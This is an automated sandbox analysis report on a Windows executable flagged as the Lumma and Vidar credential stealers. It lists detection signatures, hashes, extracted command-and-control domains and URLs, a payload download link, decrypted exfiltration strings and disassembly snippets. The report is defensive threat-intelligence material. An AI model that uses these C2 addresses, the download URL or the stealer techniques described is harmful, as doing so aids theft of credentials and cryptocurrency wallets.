Windows Analysis Report
T2bmenoX1o.exe

Overview

General Information

Sample name: T2bmenoX1o.exe
renamed because original name is a hash value
Original sample name: a72af6c3293eb3061bba1e48ba6147de.exe
Analysis ID: 1528576
MD5: a72af6c3293eb3061bba1e48ba6147de
SHA1: 316276ac440f65361db52e49a7fc4d2a9be1f457
SHA256: 7dc3d6e633cbabe95c39fa36f94ab6657e3c04dab7a9a6c1f79c9e2424378e00
Tags: 32exe

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: T2bmenoX1o.exe Avira: detected
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\ProgramData\AAFIIJDAAA.exe Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/maslengdsa"], "Botnet": "4a5bc8b73e12425adc3c399da8136891"}
Source: 8.2.AAFIIJDAAA.exe.1b0000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["frizzettei.sbs", "invinjurhey.sbs", "exemplarou.sbs", "isoplethui.sbs", "wickedneatr.sbs", "laddyirekyi.sbs", "bemuzzeki.sbs", "exilepolsiy.sbs"], "Build id": "H8NgCl--"}
Source: cowod.hopto.org Virustotal: Detection: 10%
Source: nsdm.cumpar-auto-orice-tip.ro Virustotal: Detection: 8%
Source: exemplarou.sbs Virustotal: Detection: 6%
Source: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe Virustotal: Detection: 10%
Source: http://cowod.hopto.org Virustotal: Detection: 10%
Source: T2bmenoX1o.exe Virustotal: Detection: 44%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\AAFIIJDAAA.exe Joe Sandbox ML: detected
Source: T2bmenoX1o.exe Joe Sandbox ML: detected
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: wickedneatr.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: invinjurhey.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: laddyirekyi.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exilepolsiy.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: bemuzzeki.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: exemplarou.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: isoplethui.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: frizzettei.sbs
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Screen Resoluton:
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: Workgroup: -
Source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 1_2_00411E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 1_2_0040A7AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB66C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6CB66C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 1_2_6CCBA9A0
Source: T2bmenoX1o.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:51295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51376 version: TLS 1.2
Source: T2bmenoX1o.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2249159673.0000000038339000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2244107241.000000002C45F000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2259380459.000000006CD8F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2238905953.0000000020218000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2231134063.000000001A2AE000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2257843409.000000006CBCD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC9ABF FindFirstFileExW, 0_2_00DC9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD0C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C9ABF FindFirstFileExW, 8_2_001C9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_00DDE385
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_00DDE385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 1_2_004014AD
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ebx, word ptr [ecx] 8_2_00208051
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 8_2_0020A0B9
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 8_2_001F82E8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 8_2_0021E318
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_001FA3BF
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 8_2_002243F8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_00218528
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ecx, word ptr [edi+eax] 8_2_002245E8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00222601
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, ebx 8_2_001F264D
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0020665F
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0020A687
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 8_2_002207F8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00210813
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp dword ptr [0044FDB4h] 8_2_001F2849
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_001FA86A
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 8_2_001FC89C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_002268A8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_001EE914
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0021093D
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 8_2_001E2928
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_001EE9A5
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_00226A38
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+000006B8h] 8_2_001FAA47
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 8_2_001EEAC6
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 8_2_00204AD8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00210B22
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh 8_2_0021CB36
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_00210B43
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_001ECB78
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00226BB8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 8_2_00226BB8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0020AC81
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_00204D38
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00202D48
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 8_2_001EED6B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 8_2_001E8D88
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0021CE48
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp ecx 8_2_00222EAE
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [edx], 0000h 8_2_001FCEB7
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 8_2_00224E98
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00224E98
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_00206EC4
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 8_2_0020CF30
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_00210F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+14h] 8_2_00210F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 8_2_00220F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp ecx 8_2_00222F6C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 8_2_001F0F6F
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_001FF138
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [esi], ax 8_2_001FF138
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov ebp, eax 8_2_001E71D8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0020F2B8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh 8_2_00223290
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 8_2_002093AF
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh 8_2_00223390
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 8_2_001F340E
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0020B56A
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_001FF540
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_002236C7
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 8_2_00205824
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h 8_2_00223833
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 8_2_001E1878
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 8_2_00221918
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_0020DA58
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 8_2_0020BB20
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov word ptr [edx], ax 8_2_00207B69
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_00207B48
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp eax 8_2_00205C1B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00225C62
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 8_2_001F3CBA
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov edi, ecx 8_2_001F1D02
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 8_2_001E3D78
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 8_2_001EDDC4
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_001F3E69
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov ecx, dword ptr [edx] 8_2_001DDED8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then dec ebx 8_2_0021BF08
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0020FF74
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp ecx 8_2_001E5FB0
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0020FFD5
